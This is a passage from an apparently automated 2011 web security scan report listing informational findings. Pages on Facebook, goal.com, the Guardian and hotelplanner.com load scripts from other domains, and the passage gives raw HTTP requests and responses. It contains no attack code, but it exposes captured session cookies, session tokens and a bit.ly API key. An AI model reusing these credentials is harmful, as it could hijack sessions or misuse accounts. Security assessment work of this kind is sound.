Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/CqGiwf44cv7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/i6dwhw2w3_E.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/2a5cp8CEPck.js"></script>
...[SNIP]...

20.52. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...

20.53. http://www.getaroom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
</script>


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=getaroomcom"></script>
...[SNIP]...

20.54. http://www.goal.com/en/comment/comments-box

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:56 GMT
Expires: Sat, 01 Oct 2011 23:58:55 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:55 GMT
Server: ECS (sjo/5225)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar
Content-Length: 7224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<meta name="layout" content="include"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.55. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:09 GMT
Expires: Sat, 01 Oct 2011 23:58:44 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:44 GMT
Server: ECS (sjo/522B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,epleague
Content-Length: 91057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<![endif]-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
<script src="//connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript" src="http://bit.ly/javascript-api.js?version=latest&amp;login=goalsoccer1&amp;apiKey=R_b977ffa1ea5feaaa7ba8bc44cf805e2c"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://medrx.sensis.com.au/images/sensis/goal/util.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=goal"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="social_twitter-badge">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Insight Tracking --><script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=7743/12359"></script>

<!-- Begin LotaMe Tag -->
<script type="text/javascript" src="http://tags.crwdcntrl.net/c/412/cc.js"></script>
...[SNIP]...
<!-- Pixazza image advertisements --><script type="text/javascript" src="http://www.pixazza.com/widget/53d1ac1014/"></script>
...[SNIP]...

20.56. http://www.goal.com/en/teams/england/97/man-utd-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/teams/england/97/man-utd-news HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=600
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:51:58 GMT
Expires: Sat, 01 Oct 2011 23:46:14 +0000
Last-Modified: Sun, 02 Oct 2011 23:46:14 GMT
Server: ECS (sjo/523B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,turkishair,epleague
Content-Length: 155925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://medrx.sensis.com.au/images/sensis/goal/util.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.eplayer.performgroup.com/flash/js/swfobject.js"></script>
<script type="text/javascript" src="http://static.eplayer.performgroup.com/flash/js/performgroup.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Insight Tracking --><script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=7743/12359"></script>

<!-- Begin LotaMe Tag -->
<script type="text/javascript" src="http://tags.crwdcntrl.net/c/412/cc.js"></script>
...[SNIP]...
<!-- Pixazza image advertisements --><script type="text/javascript" src="http://www.pixazza.com/widget/53d1ac1014/"></script>
...[SNIP]...

20.57. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/styles/article-page-typography.css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js"></script>
<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.writeCapture-1.0.5-min.js"></script>
...[SNIP]...
</script>
<script src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/gu-core.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/convertJSONtoAd+common/scripts/formChecker+common/scripts/glossaryPopupView+common/scripts/sendtoafriend+common/scripts/shareCounts+common/scripts/timestampPermalink+common/scripts/tweet_button.js"></script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-87~js/simplelightbox+m-87~js/simplelightbox-init.js"></script>
...[SNIP]...

20.58. http://www.guardian.co.uk/football/manchester-united

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /football/manchester-united HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:53 GMT
Server: Apache
X-GU-jas: 57-21851
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 91378
Connection: close


<!DOCTYPE html><html lang="en">

<head>

                <script type="text/javascript" >
document.domain = "guardian.co.uk";
...[SNIP]...
tp://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-482~public/css/jobs-box-4+m-661~static/1735/comment-counts+m-87~styles/simplelightbox+m-87~styles/twitter-app.css" media="screen" />
   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js"></script>
<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.writeCapture-1.0.5-min.js"></script>
...[SNIP]...
</script>
<script src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/gu-core.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/convertJSONtoAd.js"></script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-661~static/1735/fill-comment-counts+m-87~js/simplelightbox+m-87~js/simplelightbox-init.js"></script>
...[SNIP]...
</div> <script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/swfobject.js'></script><script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/performgroup.js'></script>
...[SNIP]...

20.59. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3&sensor=false&language=en"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.60. http://www.hotelplanner.com/Search/Index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.61. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
